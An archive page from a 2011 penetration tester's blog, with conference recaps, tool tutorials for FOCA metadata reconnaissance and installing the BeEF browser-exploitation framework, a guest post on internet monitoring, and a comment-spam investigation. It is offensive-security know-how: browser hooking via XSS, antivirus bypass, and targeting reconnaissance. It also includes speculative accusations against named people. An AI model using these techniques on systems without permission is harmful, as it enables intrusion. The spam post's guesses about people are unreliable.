Saturday, 31 December 2011

Silent web app testing by example slides and experience

UPDATE: Just realised that slideshare made the fonts look funny, use the "Download" option at the top to see the presentation as a PDF properly.

If you are interested you can now view and download the slides for "Silent web app testing by example" here.

I would like to take this opportunity to thank the awesome BerlinSides audience for all the kind words and support. I felt really overwhelmed by the good feedback, I almost hugged a guy when he told me something like: "I really liked your talk, it is amazing: The entry to BerlinSides is free and I am getting better talks here than in CCC". I think this was an exaggeration but thank you!!! That is motivation for the whole new year right there :).

I would also like to thank my buddy Gavin (who gave the excellent SE talk at BerlinSides) for letting me use his remote control which I believe made the presentation more natural.

Thanks go also for Aluc for having patience to answer all my questions before and during BerlinSides :) and for paying for many of the costs out of his own pocket.

The 16 owtf demos and slides will follow shortly as well as the source code release next week.

Happy new year everyone!

Friday, 2 December 2011

BruCon 2011 Lightning Talk winner slides, experience and some pics

I would like to use this opportunity to thank everybody that voted my lightning talk "Web app testing without attack traffic" as the "BruCon 2011 Lightning Talk winner".

I only had 5 minutes so I had to take out many things I wanted to cover, for this reason, I have significantly expanded this talk (106 slides + good feedback from reviewers so far) and submitted it to BerlinSides.

The slides I used for BruCon are now posted here (I only changed the website URL to the new one).

I did not even know the Lightning Talks part of the conference was also a contest and was surpised you chose mine over internationally well-known speakers and many great projects and ideas that were also presented (and I really liked myself!):

- "Metasploit shellbag information gathering module" by Jason Haddix
- "Impersonating SSL" - SSL interception tool via "plausible invalid cert" by Chris John Riley.
- "Do not fear crypto" (TYPO3 vuln walk-through) by Chris John Riley
- "Digital death - a very quick version" by Robin Wood
- "Honeymail project" to track spam by Tomasz Miklas:
- "Last year it was remote, now it's local!" by Wicked Clown (on windows priv escalation vuln)
- "Ostinato" (a packet capture / crafter) by Joke:
- Joke gave another talk the following day too! (Chris John Riley and her were the only -I think- to give 2 talks, you rock!)
- "How (not) to pick up chicks at the BruCON Party" by Melisande
- "How to suck less at ...SQUIRRELS" by Matt Erasmus
- biosshadow presented too but I forgot the talk name, I think it was about password profiling
- "Bypassing endpoint protection" by Matt Summers
(Sorry if I forgot someone, it's been a while since September!)

 From the BruCon 2011 security conference itself, I was waiting for the pictures and video to do one of my "all out, pictures or it did not happen" security conference blog posts but no conference pictures were published and most of the video was lost unfortunately.

I will briefly say that for me, personally, the best talk/workshop of the conference was undoubtedly:
"The Web Application Hacking Toolchain" by Jason Haddix

In my opinion, many (but not all) of the other talks were too "high level", Jason Haddix provided something practical that we can apply directly and explained his reasoning along the way. This is the kind of information sharing we need to do more of in the infosec community.

Thanks for the pic bioshadow!

Despite what I just said, the following non-technical talk was highly inspirational to me:
"You and your research" by Haroon Meer

From the rest, one of the best was obviously Dan Kaminski with "Black Ops of TCP/IP 2011" and also Alex Hutton with "Why Information Risk Management Is Failing, Why That Matters to Security & What You Can Do About It" you can see a picture of them enjoying a Mojito here:
Thank you to the person that tweeted this :). Was it you Marisa?

Jimmy had an awesome T-shirt everyday:
Thanks for pic Tomasz!

And I found everybody very approachable and nice during the 1st but also the 2nd day after party:
Thanks for the pic Marc!

I was also impressed by the Mobile phones talk: "Smart Phones – The Weak Link in the Security Chain" by Nick Walker and Werner Nel. This was really good research and definitely a lot of work.

There were many other great talks and I also specially liked Chris Gates and Joe McCray with "Pentesting High Security Environments" and "Abusing Locality in Shared Web Hosting" by Nick Nikiforakis.

As usual I could not physically attend everything but from what I attended, that was the best in my opinion.

A full list of what each talk was about can be found here:

Wednesday, 19 October 2011

Test your SSL: TLSSLed v1.2 released!

I have decided to stop swearing when tools don't work and fixing them or implementing my improvements and then send them to the tool author instead. The point is to give back to the community since after all the community gave it to me for free first :).

As part of this initiative as I was playing with TLSSLed on a weekend, I had a few ideas, implemented them and send them to Raúl Siles, the tool author. He is a very capable guy, made my contributions even better and was cool enough to add me to the credits :).

TLSSled automates the blackbox tests for the Testing for SSL-TLS (OWASP-CM-001) entry in the OWASP Testing Guide. It is very simple to use and the results are easy to read. I highly recommend it.

You can see a detailed write-up on the new features and download the tool here or read more about it on Taddong's blog.

I originally saw the tool on the site and more precisely here. However, since Raúl is owning the tool I would suggest to download it from Taddong's site instead.

Friday, 7 October 2011

Backtrack 5 Shell Script to Change the Ruby Environment automatically

NOTE: I also posted this to the BeEF Project Wiki here

Some Backtrack 5 security tools need ruby 1.8 (i.e. whatweb) and others ruby 1.9.2 (i.e. BeEF). This script automates the switch.
By setting the ruby environment to the correct ruby version we can run all tools. This script aims to make this small task easier to do and in a more scripting-friendly way.
Instalation Instructions:
  1. copy-paste code below into a file called, ideally somewhere in your PATH
  2. chmod 700 # (obviously!)
IMPORTANT: You need to call this script with a ". " in front of it to alter your environment settings.
  1. . 1.8 ; /pentest/enumeration/web/whatweb/whatweb
  2. cd /pentest/web/beef ; . 1.9.2 ; ruby beef
If you try to start BeEF using the incorrect environment you should see an error message like this:
"Ruby version 1.8.7 is no longer supported. Please upgrade 1.9 or later."
If you ran the Backtrack 5 Installation Script then you would only need to run this script to run ruby 1.8 tools.

Source code to copy-paste:

Wednesday, 28 September 2011

Why All IT Departments Need to Monitor Internet Usage

Five years ago, using a software system to monitor Internet usage may have been seen in some quarters as the preserve of large companies, and not so much of a concern to SMBs.
Productivity loss, time wasted on non-work related browsing and excessive use of video streaming, are a few reasons why more and more IT departments are looking into internet monitoring and filtering for their organizations.
Most managers will be familiar with walking into an office and seeing a member of staff scrambling to “minimize” their internet browser window because they were on Facebook, eBay, or checking their personal email! People conduct a large part of their social, financial and personal lives via the Internet, so it is understandable that, with unrestricted Internet access at work, people will be tempted to browse. Although some employees will do so for limited periods, not everyone restricts their browsing at work to a few minutes during the day.

The decision to monitor Internet usage may be driven simply by a need to reduce this non-productive time in the office, but sometimes, the security risks associated with unrestricted browsing can be far more significant.

Malicious Hackers are always keen to exploit “back-doors” into computer networks, which is why viruses and malware exist that target Facebook apps and web-based email accounts. IT departments sometimes invest large amounts of time and money in protecting core systems and email gateways, only to find that viruses enter the network due to unsuspecting users opening unsafe attachments in their personal email accounts or visiting compromised websites.

Internet monitoring software can help to protect less technical staff from Internet threats - pre-scanning for malicious websites and preventing access to anything that may compromise the network.

It is quite possible to monitor Internet usage and restrict it appropriately without having to take truly draconian steps. Good Internet monitoring solutions allow settings to be configured to a precise degree; however, for example, allowing a sensible level of personal use, perhaps restricted by time periods, or quantity of downloaded data.

Once employees are informed that the company has begun to monitor Internet usage, they are likely to automatically cut down the time they spend browsing non-work related sites. They will also notice that their internet connection is actually much better allowing them to get their work done much faster.

Widespread browsing within an organization can be a real drain on company bandwidth, especially when users are accessing media-rich websites such as Facebook and YouTube.

Companies should make it very clear to employees why they need to monitor Internet usage and introduce a written monitoring policy to detail how the monitoring is conducted, and what level of personal use is considered acceptable.

Although some companies may see monitoring Internet usage as intrusive, there are valid legal, security and productivity reasons why monitoring should take place. The good thing is that properly managed and configured web monitoring solutions can help to maintain a good balance between the needs of the organization and employees taking a break to check their email or update their social networking profile.

This guest post was provided by Ben Taylor on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Read more on monitoring internet usage.

All product and company names herein may be trademarks of their respective owners.

Tuesday, 13 September 2011

Testing Web apps without attack traffic

I will be giving a lightning talk at Brucon next week. My goal is to give a quick overview on the vast amount of tests possible before you have permission to test a target. This is particularly useful if you are given a short test window but you are willing to put the extra effort to do as much as you can beforehand.

See you at Brucon!

Sunday, 21 August 2011

Unleashing the power of metadata with FOCA Free


The terrific guys at informática64 put together the FOCA tool (for mostly automated metadata extraction in the free version) quite a while ago and they just keep improving it continously. The Pro version is just 100€ + VAT and you get a lesson from Chema Alonso along the way so worth considering too :).

I recently heard on the Spanish version of the PaulDotCom podcast that the tool name "FOCA" ("Seal" in Spanish) comes from the guy who first implemented the tool at informática64. His name is "Fernando Oca" and his username was logically "Foca". This led to a lot of healthy jokes at informática64 and the tool name was inevitable :).

The version used in this tutorial will be FOCA Free (the free version has significantly less options but it is still very useful). They are going to release version 3 soon (Spanish) so I might publish another tutorial in a few months, when the tool will be significantly improved as they say.


This is a windows tool so you just download it from here, install it (typical "next next finish" install) and run it. No secrets here :)

Basic usage

The first step when using FOCA is to choose your search type, you can choose "" or " filetype:doc", etc.

In this demonstration we will use and search for .doc documents only. Because Google is mostly a Linux/MAC shop (asfaik) this yields little results which is good for demonstration purposes:

When you have a bunch of sites as I did in a recent test I like to use: OR ..... and if they are not very big do not specify a filetype: This will return everything, including web pages, which you can analyse later for HTML comments, etc too.

The next step is to download all documents, to do that just Right click / Download All:

This will download all indexed files locally, after the download completes we can retrieve the metadata from the downloaded files (Metadata / Extract all documents metadata):

Once the metadata is extracted we can review it:

The metadata identifies 3 potential users as well as 1 software package in use and an operating system.
Apparently all 3 users are using Mac OS at Google! :)

We can now correlate the metadata to get a per user, printer, etc view. We can do this as follows:

 In the analysis we can see that all the metadata comes from the same user, who is using Mac OS and Microsoft Office 2008 for Mac OS. This information would be useful in a targetted client side attack because specific exploits could be searched for the versions in use by the client:

Now let's look at information from the field. What can you really find in a normal pen test?
A bunch of users, printers, folders, software and operating systems :)

When you look on the by user metadata analysis you can see what software version is potentially running each user and you get a nice icon to quickly identify each computer by username:

The servers and printers usually contain very interesting correlated information like for example which users had access to each printer or server.

It is a bit of a pain to extract the information out of FOCA Free (I suppose this is easier to do in the paid version :)) but you can at least browse the downloaded files and perhaps even run them through another metadata tool like the exiftool. You can extract the information of each record (one by one manually) by right clicking on it:

On a default Windows 7 Installation FOCA downloads the files on:
C:\Users\<windows 7 user>\AppData\Local\Temp

You can tell apart the FOCA files from the rest quite accurately based on the download timestamp.

A minor issue, particularly when many domains are used at once is that files like index.php will be created as "index(1).php", "index(2).php", etc. Then it takes a bit of work to figure out which index.php belongs to each domain.

Better results can be achieved with a tool like wget or Httrack for website crawling and HTML comments and JavaScript code analysis.

The true power from FOCA comes from the automated "even my grandma can do it" metadata analysis, including correlation by user, server and printer.

Monday, 8 August 2011

Red Meat Series: Installing BeEF on Windows Systems

I also posted this guide as a wiki entry on the BeEF project page here.

Installing BeEF on a Windows System might be a bit confusing for some users: There is not a typical windows installer where you click "Next Next Finish" and then everything works. You need to perform a series of manual steps to get BeEF to work and there can be some strange problems along the way.

This article tries to explain one way of doing this which worked for me.

The first step is to install ruby. You can download ruby for windows from this URL:

You can check the hashes in Windows using a tool like for example Hash Tab (which adds a tab to the file properties showing you the hashes).

In addition to verifying the hashes, before you run any executable you download from the internet it is a good approach to run it through Virus Total first. This will scan the executable with more than 40 antivirus engines. This is however not a guarantee that the program is not malicious and can in fact be bypassed (using msfencode, for example). When no antivirus engine finds a problem with the downloaded file that provides you with a higher degree of confidence that the file is hopefully safe.

Once we are happy with the file hashes and the virus analysis we can move on and install this program. These steps are skipped later on other executables for brevity. I installed Ruby ticking all the boxes:

 After installing Ruby, you need to download the SQLite dll from this URL.

Now extract the SQLite zip file on the Ruby192\bin folder:

 Unless you have it handy we will also need to download and install a good SVN client for windows like for example Tortoise SVN:

 I marked everything as "install all the features in the local drive" during setup (although this is obviously not necessary, depends on what else you plan to do with SVN):

 You will have to reboot your system after installing Tortoise SVN. Once you reboot you can get the latest BeEF version by performing an SVN export (right click on a blank space in the BeEF folder / Tortoise SVN / Export):

That will present you the following screen, where you can put in the BeEF trunk URL:

 When you click OK you should see something like this (files are copied from the SVN URL to your hard drive):

 Now, using the windows command line (I like start / run / type: cmd + Enter) you just need to do ruby install on the BeEF installation folder, in this example E:\BeEF. You can choose the option to install ruby gems automatically or manually:

 If the gems installation goes ok, you should see something like this:

But you might get a missing win32 console gem error too:
no such file to load -- Win32/Console/ANSI (LoadError)

 This error is easy to solve, just do gem install win32console:

You could also get this error (or similar "requires installed build tools" message):
The 'json' native gem requires installed build tools

In this case we need to install the Development kit. You can donwload it from this URL. There are great instructions on how to install this kit here (What comes next is the result of directly following the instructions in the development kit wiki). First we need to download it:

The file is a self-extracting compressed file so you just need to extract it in a handy place like C:\DevKit, for example:

Now we need to run "ruby dk.rb init" to generate the "config.yml" file to be used later:

We can open the file to make sure that it found where Ruby was installed:

Now a few other steps:

  1. ruby dk.rb review (checks things are ok)
  2. ruby dk.rb install (creates DevKit hooks)
  3. gem install rdiscount --platform=ruby (you should see the message "Temporarily enhancing PATH to include DevKit...")
  4. ruby -rubygems -e "require 'rdiscount'; puts'**Hello RubyInstaller**').to_html (just to check the gem was installed and works correctly)
In one picture:

 Now that DevKit is installed we should have no problem to install that missing json gem:

Now we can check the installation, just do "ruby beef" to start beef. Of course you will need your Windows Firewall to allow that application :).

 Now, do not be lame and wonder what the password is by going to the GUI here:

The password is in the configuration file at <beef folder>\extensions\admin_ui\config.yaml. You can see that the default username and password is beef / beef. That does not mean that those are the credentials you should use to login. What that really means is that everybody knows those credentials and if you don't change them your BeEF server could be compromised:

Therefore what you should do is to change those credentials and pick a different username and a very long and complex password:

After saving the file above. You will get the following error message when you try to login: "invalid username or password". This is due to the fact that when BeEF was loaded the previous configuration file was read so the old credentials are still in use:

What we need to do here is to stop the BeEF server (via Control + C) and then start it again. That will make BeEF read the new configuration file so the new credentials will now be accepted:

 The credentials work this time and we are presented with the BeEF server home page:

How do we know if BeEF is working? We need some client browser to connect. Just copy the hook URL ( will work from the same computer)

Now you need a web server: a place where you can create a web page that contains a call to the JavaScript hook. You could also exploit an XSS vulnerability on an internet server to get around this but that will be covered later in the Red Meat Series :). In this example, we will use a typical Apache installation where a simple index.html file is created:

The most important bit from the screenshot above is the script part: It is only that part of the page that contains the hook to BeEF. That is the kind of JavaScript you would like to use to exploit an XSS vulnerability with BeEF.

When a user browses to this site, they are presented with a normal web page. In the background the script connects back to the BeEF server:

The BeEF server receives the new connection and from there different client side commands and attacks are possible via the BeEF framework:

At this point the installation has been verified to be successful. Enjoy and do not be evil :).

Tuesday, 2 August 2011

Blog Spam Analysis Series: CISSP Spam surprise

Update 08/08/2011: Added link to further evidence of Shon Harris spamming via blog comments from ittraining blog at the bottom of the post.

I have maintained this blog for some time. I appreciate comments but sometimes there is spam that unfortunately gets in:

In particular, I was interested in the CISSP spam: The CISSP post is one of the most popular in this blog and perhaps that is why Spam tends to get there.

In the screenshot above you may notice that the CISSP spam so far comes from three spammers: Gowshika, Mithun and Nitheesh. Let's take a look at them:

Gowshika's information:
- Spam messages to my blog to date: 1 (100% CISSP Spam)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August 2011 when the spam arrives
- Potentially an Indian female according to minor research below if the name is really her real name.
- Spam link goes to:

Although I did not know this initially, a simple Google search reveals that Gowshika is an Indian name:

Would you put your name in your profile if you were a spammer? I suppose I would not :). That being said we have to admit that Gowshika was smart enough to avoid writing down her surname, email address and phone number :). Gowshika could also be the name of the spammer's girlfriend or whatever but this somehow points to India anyway.

I was going to go with the rough rule of "if it finishes in 'a' it is possibly a girl" but I actually double checked that Gowshika is truly a female name with a couple more Google searches like "Gowshika male" and "Gowshika female".

Next spammer:
Mithun's information:
- Spam messages to my blog to date: 2 (100% CISSP spam)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August 2011 when the spam arrives, previous spam link sent on 29/6/2011.
- Potentially an Indian male according to minor research below if the name is really his real name.
- Spam links go to:

There is a famous Indian actor as the first Google result (so possibly: Indian and male):

Next spammer:

Nitheesh's information:
- Spam messages to my blog to date: 2 (100% CISSP spam, 1 message went to this post but the spam link still pointed to a CISSP site)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August when I could still open the profile (02/08/2011). both spam links sent on 21/6/2011.
- Potentially an Indian male according to minor research below if the name is really his real name.
- Both spam links go to:

A simple Google search reveals this is an Indian male name:

At this point the state of the investigation is as follows:
- 3 spammers for all CISSP spam links to date
- Potentially 2 Indian males and 1 Indian female
- 100% of CISSP spammers were potentially Indian
- 100% of the CISSP links go to
- Spam links:

I was thinking that despite looking very similar if not identical to Shon Harris' main CISSP domain for selling CISSP materials, this site would probably be some form of malware site (seriously, that was my first reaction). However, I was wrong: appears to be a legitimate site and even Shon Harris' linkedin profile links to it!

It seems unlikely to me that Indian people would bother to post CISSP spam comments in my blog for the lulz alone. You do not need to be very smart to realise that the business model points to Shon Harris outsourcing spammers in India to increase sales of her CISSP training materials.

Further, there is evidence gathered by that was previously spamming via email too, both in 2008 and in 2010 

Not only that, but Jericho from actually confronted Shon Harris directly about it in 2010 and Shon did not mention, ever, in a single line of her emails (yes I read it all) that she was not sending spam. Ironically the conversation started because Shon had problems to unsubscribe from the mailing list :).

There are hints of this in the emails that went on between Jericho and Shon but I wondered this myself too as I was investigating the spam in my blog: What is the value of the CISSP code of ethics if the top authority in CISSP training materials and a CISSP herself, Shon Harris, violates them like this?

One of the clauses in the code of ethics is literally: "Act honorably, honestly, justly, responsibly, and legally".  A CISSP, or anybody with some basic ethics for that matter, should not be sending Spam. Matters get worse when you are not only a CISSP but also training other future CISSPs, most people would expect the trainer to lead by example.

Finally, I would like to mention that the following looks unprofessional too:

# curl -A CISSP -i|head -3
HTTP/1.1 200 OK
Date: Tue, xx Aug 2011 xx:xx:xx GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ PHP/5.2.9

Pro tip: Do not spam security folks ;)

Update 08/08/2011: Further evidence of this activity from the ittrainingblog (04/08/2010):
"FUNNY UPDATE: Check out the comment spam we got from Shon Harris' blog, I actually approved it. Im interested to know what spammy SEO company she has marketing her site, Shon has far too strong a name in the industry for that."